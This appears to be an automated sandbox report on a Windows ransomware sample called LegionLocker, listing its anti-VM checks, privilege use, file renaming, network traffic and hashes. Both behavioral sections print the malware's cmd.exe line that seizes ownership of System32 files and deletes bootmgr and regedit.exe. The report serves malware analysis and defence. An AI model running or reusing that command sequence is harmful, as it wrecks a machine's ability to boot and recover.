Analysis Overview
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
Threat Level: Known bad
The file Ransomware LegionLocker.exe was found to be: Known bad.
Malicious Activity Summary
Renames multiple (465) files with added filename extension
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Renames multiple (153) files with added filename extension
Disables Task Manager via registry modification
Possible privilege escalation attempt
Modifies file permissions
Reads user/profile data of web browsers
Themida packer
Checks computer location settings
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-05 12:23
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 12:23
Reported
2024-11-05 12:25
Platform
win7-20240708-en
Max time kernel
140s
Max time network
120s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Renames multiple (153) files with added filename extension
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
Files
memory/1724-0-0x0000000000F60000-0x0000000001790000-memory.dmp
memory/1724-1-0x0000000075201000-0x0000000075202000-memory.dmp
memory/1724-8-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-10-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-9-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-7-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-6-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-5-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-4-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-3-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-2-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-20-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-22-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-19-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-18-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-17-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-16-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-15-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-14-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-13-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-12-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-11-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-25-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-27-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-26-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-28-0x0000000000F60000-0x0000000001790000-memory.dmp
memory/1724-29-0x0000000000F60000-0x0000000001790000-memory.dmp
memory/1724-30-0x00000000751F0000-0x0000000075300000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
| MD5 | f2bbb85d6112bd7360a4ddbc23ea9a8b |
| SHA1 | 683eb7b2b0a5904337f204f71d25c02b9cc5daba |
| SHA256 | be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2 |
| SHA512 | a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log
| MD5 | 2caa6f3c95f6ec6bba5b54344938efa0 |
| SHA1 | 2d5637f50e858fbaaeec7853d944dd3c3e91ec39 |
| SHA256 | 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6 |
| SHA512 | 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00 |
memory/1724-286-0x0000000000F60000-0x0000000001790000-memory.dmp
memory/1724-287-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-326-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-325-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-324-0x0000000075201000-0x0000000075202000-memory.dmp
memory/1724-328-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-327-0x00000000751F0000-0x0000000075300000-memory.dmp
memory/1724-329-0x00000000751F0000-0x0000000075300000-memory.dmp
C:\Users\Admin\Documents\RevokeUnpublish.xlsx
| MD5 | 98320b7eb431a4d989a4cd3031e723b9 |
| SHA1 | 7b59bc263c75bf899d4302d236b1c3806d87e3d1 |
| SHA256 | 6591551d4d97286fb4d1af05cf82289fe0ef690b46c52e88458cf1d8d8ef580b |
| SHA512 | 27487d804f4162ef39bd0bdeccfe6b927b40ee2fea612af35982ff72a37ce823651d04a0037814fd63b3e71c28082196f2f3d31eb916e3bef6cf937804db9167 |
memory/1724-403-0x00000000751F0000-0x0000000075300000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-05 12:23
Reported
2024-11-05 12:25
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Renames multiple (465) files with added filename extension
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.30.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.30.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
memory/3928-0-0x0000000000720000-0x0000000000F50000-memory.dmp
memory/3928-1-0x0000000076A10000-0x0000000076A11000-memory.dmp
memory/3928-4-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-6-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-5-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-3-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-2-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-7-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-8-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-11-0x0000000000720000-0x0000000000F50000-memory.dmp
memory/3928-12-0x0000000000720000-0x0000000000F50000-memory.dmp
memory/3928-13-0x00000000061F0000-0x0000000006794000-memory.dmp
memory/3928-14-0x0000000005C40000-0x0000000005CD2000-memory.dmp
memory/3928-15-0x0000000005D00000-0x0000000005D0A000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\HOW-TO-DECRYPT.TXT
| MD5 | f2bbb85d6112bd7360a4ddbc23ea9a8b |
| SHA1 | 683eb7b2b0a5904337f204f71d25c02b9cc5daba |
| SHA256 | be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2 |
| SHA512 | a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172 |
memory/3928-64-0x0000000000720000-0x0000000000F50000-memory.dmp
memory/3928-101-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-102-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-136-0x0000000076A10000-0x0000000076A11000-memory.dmp
memory/3928-173-0x00000000769F0000-0x0000000076AE0000-memory.dmp
memory/3928-316-0x00000000769F0000-0x0000000076AE0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
| MD5 | 2caa6f3c95f6ec6bba5b54344938efa0 |
| SHA1 | 2d5637f50e858fbaaeec7853d944dd3c3e91ec39 |
| SHA256 | 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6 |
| SHA512 | 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml
| MD5 | 89b6590fcb9080db24875fa671b516ca |
| SHA1 | 20e472ccdba84d504e087418e703073f44c4f2d9 |
| SHA256 | d883bdee08b17e451d3be046fd7cd7b9c816c37f72fa123ca1c13c81e9fcd5ac |
| SHA512 | 3eea6d9796596d9d491b2fa1de794c33bda6447e11c611d769c32da6bd62f25d4b7b13748e70a601ae70f45eb36463d7080e16fcf80571e693109d9395345ee0 |
C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
| MD5 | 5090259c42fc6263bc00e952846280e8 |
| SHA1 | 9bf53e854027c9dec3b25ff1164e88872c71f66e |
| SHA256 | a05288aa086504a20d2a3177854f8eb158778756ebc24dcfca266c52fa8d5a17 |
| SHA512 | 8b44fb8fade639c6b4d4b1f8747a8176652700a16b38e43f5f74403c2af0882fb6095986f8e4d94f3d5a242e8d49ed99a03361c01469c8c6a7bf7a7c3527ec7f |